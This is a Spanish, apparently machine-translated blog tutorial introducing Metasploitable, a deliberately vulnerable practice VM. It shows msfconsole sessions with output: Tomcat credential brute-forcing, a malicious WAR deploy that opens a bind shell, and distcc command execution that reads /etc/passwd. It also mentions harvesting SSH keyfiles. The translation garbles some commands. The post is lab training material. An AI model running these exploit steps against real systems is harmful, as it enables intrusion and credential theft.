Solapas principales

Sep 14 2012

Metasploitable

Metasploitable es una distribución linux basada en ubuntu desarrollada por el equipo de metasploit para ser usada como sistema operativo "víctima" en una virtual machine y poder practicar con metasploit framework.Ya que tiene vulnerabilidades acentuadas es ideal como banco de pruebas,test de penetración etc.
 


Una de las preguntas que a menudo se escucha es "¿Qué sistemas se pueden utilizar para para practicar ataques?" En base a esto, pensamos que sería una buena idea juntar un VM explotables que se puede utilizar para propósitos de prueba.

Metasploitable es una instalación de Ubuntu 8.04 en un servidor VMWare 6.5 imagen. Una serie de paquetes vulnerables se incluyen, como una instalación de Tomcat 5.5 (con credenciales débiles), distcc, TikiWiki, twiki, y un mysql más.

Puede utilizar la mayoría de los productos de VMware para ejecutarlo, y usted querrá asegurarse de que está configurado para redes sólo de host a menos que sea en el laboratorio - no hay necesidad de lanzar otra máquina vulnerable en la red corporativa. Que está configurado en el modo no persistente en el disco, por lo que simplemente puede restablecer si accidentalmente "rm-rf 'él.

Aquí hay un par de cosas que puedes hacer con él en msfconsole:

Uso de la "Utilidad de aplicaciones Tomcat Acceder 'proporcionada por MC, Cantoni Matteo, y jduck, puede probar las credenciales con una aplicación Tomcat (suponiendo que el componente de administrador está activada):

msf> utilizar el escáner / http / tomcat_mgr_login
msf auxiliar (tomcat_mgr_login)> rhosts conjunto metasploitable
msf auxiliar (tomcat_mgr_login)> set rport 8180
msf auxiliar (tomcat_mgr_login)> explotar
...

  • 10.0.0.33:8180 - Tratar de nombre de usuario: 'gato' con la contraseña: "role1 '
  • [-]

Http://10.0.0.33:8180/manager/html [Apache-Coyote/1.1] [Administrador de aplicaciones Tomcat] no ha podido iniciar la sesión como 'gato'

  • 10.0.0.33:8180 - Tratar de nombre de usuario: 'gato' con la contraseña: "root"
  • [-]

Http://10.0.0.33:8180/manager/html [Apache-Coyote/1.1] [Administrador de aplicaciones Tomcat] no ha podido iniciar la sesión como 'gato'

  • 10.0.0.33:8180 - Tratar de nombre de usuario: 'gato' con la contraseña: 'gato'
  • Http://10.0.0.33:8180/manager/html [Apache-Coyote/1.1] [Administrador de aplicaciones Tomcat] conectar con éxito 'gato': 'gato'
  • 10.0.0.33:8180 - Tratar de nombre de usuario: "ambas" con la contraseña: "admin"

Woot! Eso es válido (tomcat: tomcat) inicio de sesión. - Ahora que tenemos las credenciales válidas, vamos a tratar de Tomcat jduck de Administrador de aplicaciones de activacià (tomcat_mgr_deploy) en contra de ella:

msf> use multi / http / tomcat_mgr_deploy
msf exploit (tomcat_mgr_deploy)> set rhost metasploitable
msf exploit (tomcat_mgr_deploy)> configurar nombre de usuario tomcat
msf exploit (tomcat_mgr_deploy)> SET PASSWORD tomcat
msf exploit (tomcat_mgr_deploy)> set rport 8180
msf exploit (tomcat_mgr_deploy)> CARGA conjunto linux/x86/shell_bind_tcp
msf exploit (tomcat_mgr_deploy)> explotar

  • Se unen empezar manejador
  • El intento de seleccionar automáticamente un objetivo ...
  • De destino seleccionado automáticamente "Linux X86"
  • Carga de 1612 bytes como HJpy1H.war ...
  • Ejecutar / HJpy1H/EpKaNLsCQUUjo.jsp ...
  • HJpy1H anular la implementación de ...
  • El envío de la etapa (36 bytes) para metasploitable
  • Al shell de comandos 1 ª sesión abierta (10.0.0.11:39497 -> 10.0.0.33:4444) en 19/05/2010 11:53:12 -0500


Sweet! Y ... que es una concha, facilitado por un archivo malcious. WAR. El módulo distcc_exec es también una buena explotación de los tests. En este caso, vamos a utilizar una carga útil de comandos para 'cat / etc / passwd:

el uso de UNIX / misc / distcc_exec
msf exploit (distcc_exec)> set cmd CARGA / unix / genéricas
msf exploit (distcc_exec)> set rhost metasploitable
msf exploit (distcc_exec)> set CMD "cat / etc / passwd '
msf exploit (distcc_exec)> explotar
la conexión ...

  • Stdout: root: x: 0:0: root: / root: / bin / bash
  • Stdout: daemon: x: 1:1: daemon: / usr / sbin: / bin / sh

...

Código ejecutivo!

Es muy divertido correr expreso en contra de ella también. Un ataque de fuerza bruta solo de ssh o telnet volverá 5 sesiones (a partir de las 5 cuentas diferentes débil en la máquina virtual).

Una vez que tengamos una sesión abierta que se puede ejecutar "Recopilación de evidencia" y recoger cualquier keyfiles ssh desde las cuentas de usuario que accedió a. (Tenga en cuenta que usted puede hacer esto desde la consola también, de forma manual - generar un shell y compruebe los directorios de ssh.). Ahora, cuando nos encontramos otra fuerza bruta (con el "conocido" credenciales), se utiliza el keyfiles SSH para acceder a la caja.

Para descargar Metasploitable, usted puede recoger el torrent aquí . A README.txt se pueden encontrar en el torrente que contiene contraseñas (cuidado con los spoilers). Si usted es un cliente, que le permite recoger una descarga directa HTTP desde el Centro de clientes .

Metasploitable:http://blog.metasploit.com/2010/05/introducing-metasploitable.html


 

Contenido por etiquetas

Linux Linux Tips Solución Linux Help Drupal Arch-Linux Media Front Terminal Videos Hacking Linux seguridad Manjaro Shell Servers Linux-Distro Consola Linux Guías Comandos Android Screencast Ubuntu Drush Windows Backtrack Joomla Mac OSX Command Line Xampp Compiz Fusion Debian Telefonía Skype Servidor Local ROOT Virtualmin Instalación Drupal 7 Cracking Media Youtube Webmin Views Sysmonitor Setup Server Samba PDF KDE Libros Kali Linux ownCloud Grub Joomla Seguridad Antergos ClamAv CyanogenMod Descargar Nivo Slider Elastix error Escritorio Drush_Make SCP Seguridad SEO servidor web SSH Top 500 Unix url canonica url Limpias Virtual Xampp 1.8.1 XFCE Youtube ROM PHP Rootear mysql apache Asterisk Boot Chrome dd Distros Drush Windows Centos Joomla 3.0 Iphone Metasploit MacOS Líder Noticias Katana Kali (bootstrap) 10 Millones 1and1 Acquia Ahorra Aircrack-ng Alsi Archserver .make Arranque bitacora sniffing sistema Sigram Shutter Secure Copy Script SA-CORE-2013-003 Redgum Redes red Sox Recovery Rarcrack Prestashop Piropos Geek PhpMyadmin PBX Papá Overlook Fing Open DNS Office Nube Real Estate ncdu SQL String Xwinwrap WPS Wol Wine Windows 10 winAUTOPWN Whatsapp Webform_Layout Webform Layout Webform Streaming Wake On Lan Views Horizontal Slider Viber Triple-Boot TinyMCE Tilt 3D Texto Telegram Tails Sustituir Supercomputadoras VMplayer Atraci Munich Migrar Fish firewall firestarter FINK Fing FDesktopRecorder fallo exec: 90: : Permission denied Enlaces Externos Encriptar FTP duff Drupal 8 Driver r8168 DARKY´S ROM CryptKeeper Conky compartir Códec CKEditor Cerebro Cain & Abel dselect MS-SQL g729 Galaxy S3 vs Iphone 5 Metasploitable MediaFront Media Vimeo LPS Line LAMP Kingsoft Office Joomla 2.5 Jdownloader Inyection SQL Galaxy S internal server error 500 Imagesloaded htaccess Horizontal Slider grep Google-Earth Gimp gh22ns50 GCP Galaxy S4 IMCE youtube-dl